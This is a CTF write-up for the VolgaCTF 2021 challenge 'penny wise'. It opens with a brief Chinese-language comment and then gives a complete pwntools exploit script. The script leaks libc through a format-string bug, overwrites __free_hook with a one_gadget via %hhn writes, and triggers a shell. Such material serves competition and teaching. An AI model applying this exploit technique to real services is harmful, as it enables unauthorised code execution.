2021VolgaCTF

penny wise

心态非常崩的一道题,发现别人是没有用格式化字符串做的,可是我只看到了格式化字符串。

而且patchelf给出的偏移在这道题有错……

我真的非常不理解,我需要看一看patchelf的原理和具体实现。

#!/usr/bin/python

from pwn import *
# Global pwntools setup: verbose tube logging, tmux for any gdb attach, x86-64 target.
context.log_level = logging.DEBUG
context.terminal = ['tmux', 'new-window']
context.arch = 'amd64'

# 0 -> talk to the remote service; anything else -> run ./bin locally.
LOCAL = 0

# glibc the local run is pinned to via LD_PRELOAD. Every raw offset further down
# presumably comes from this exact build, so the remote target is assumed to match it.
libc_path = '/home/ainevsia/gh/glibc-all-in-one/libs/2.27-3ubuntu1.3_amd64/libc.so.6'

# `p` is the single tube every helper below drives (only one branch is evaluated).
p = (
    process(['./bin'], env={'LD_PRELOAD': libc_path})
    if LOCAL
    else remote('139.162.160.184', 19999)
)

def store(title, content):
    """Select menu option 'S' and answer the title and content prompts.

    `title` / `content` may be str or bytes; they are passed straight to the
    tube `p` defined at module level.
    """
    steps = (
        ('[Q]uit\n', 'S'),
        ('title\n', title),
        ('content\n', content),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

def ret(title):
    """Select menu option 'R' for `title`.

    The script reads its leak right after this call, so this option presumably
    prints the stored entry back (the program's own text is not visible here).
    """
    steps = (
        ('[Q]uit\n', 'R'),
        ('title\n', title),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

def delete(title):
    """Select menu option 'D' for `title`.

    Used once, as the final step of the script; what the program does on 'D'
    is not visible here beyond the menu letter.
    """
    steps = (
        ('[Q]uit\n', 'D'),
        ('title\n', title),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)


# Stage 1: leak. Two "%016llx" conversions are stored as content and printed
# back on retrieval; the second one reads positional argument 45 (the author's
# count: 5 + 0x27 + 1), which is the value turned into a libc base below.
title = 'AAAAAAAA'
leak_arg = 5 + 0x27 + 1
# earlier variant kept for reference: f'%{leak_arg}$016llx-'.ljust(9)
store(title, f'%016llx-%{leak_arg}$016llx-')
# attach(p, 'b *$rebase(0xD95)\nc')   # breakpoint used while debugging
ret(title)

# The output has the shape "<first>-<second>-": skip the first field, keep the second.
p.recvuntil('-')
leaked = p.recvuntil('-').rstrip(b'-')
# Distance from the leaked pointer to the libc mapping, taken from one debug
# session (hence the raw 0x7f... addresses); it is specific to this libc build.
LEAK_TO_BASE = 0x7fea2b0acbf7 - 0x7fea2b08b000
base = int(leaked, 16) - LEAK_TO_BASE
p.success('base: ' + hex(base))

# Also a raw debug-session offset. The symbolic form would be
# ELF(libc_path).symbols['__free_hook'], which the author left commented out.
FREE_HOOK_OFF = 0x7f5dacc498e8 - 0x7f5dac85c000
free_hook = base + FREE_HOOK_OFF
p.success('free_hook: ' + hex(free_hook))
onegadget = base + 0x4f432  # other offsets the author listed: 0x4f3d5 0x4f432 0x10a41c

# Stage 2: six %hhn writes, one per byte of `onegadget`, each through positional
# argument 14. The entry title holds the low 6 bytes of the target address after
# a 1-byte pad -- presumably that is what argument 14 points at (not verifiable here).
gadget_bytes = onegadget.to_bytes(8, byteorder='little')
for byte_idx in range(6):
    target = free_hook + byte_idx
    title = b'A' + target.to_bytes(8, byteorder='little')[:6]
    payload = f'%{gadget_bytes[byte_idx]}c%14$hhn'.ljust(9)
    store(title, payload)
    ret(title)

# Stage 3: act on the first entry, then hand the tube to the user.
title = 'AAAAAAAA'
delete(title)
p.interactive()